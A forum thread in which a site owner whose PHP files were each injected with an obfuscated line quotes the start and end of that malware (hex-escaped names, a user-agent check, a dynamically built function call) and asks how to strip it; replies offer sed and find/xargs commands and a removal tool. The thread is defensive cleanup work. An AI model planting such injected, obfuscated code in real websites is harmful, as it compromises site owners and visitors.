a website of mine is hacked. In every php file a line of code is added. I wont post the complete code here, but it starts with:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr = 

and ends with:

 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>

I've tried finding and replacing with some ssh commands, but it doesnt seem to work. (Read: my lack of ssh knowledge gets in the way).

This is my latest atempt:

sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php

Can anyone help me?

You can try this : https://github.com/daniyalahmadk/RMCI

Just need to put that code in box and hit submit, it will search code from files and remove them all once.

You need to add s/ at the start.

sed 's/<?php if(\!isset.*gzagexgpdc-1; ?>//g' *.php

OR

sed -r 's/<\?php if\(!isset.*gzagexgpdc-1; \?>//g' *.php

Add -i parameter to save the changes made.

This should work.

find . -name "*.php" -print0 | xargs -0 sed -ri '1s/^<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>//' *.php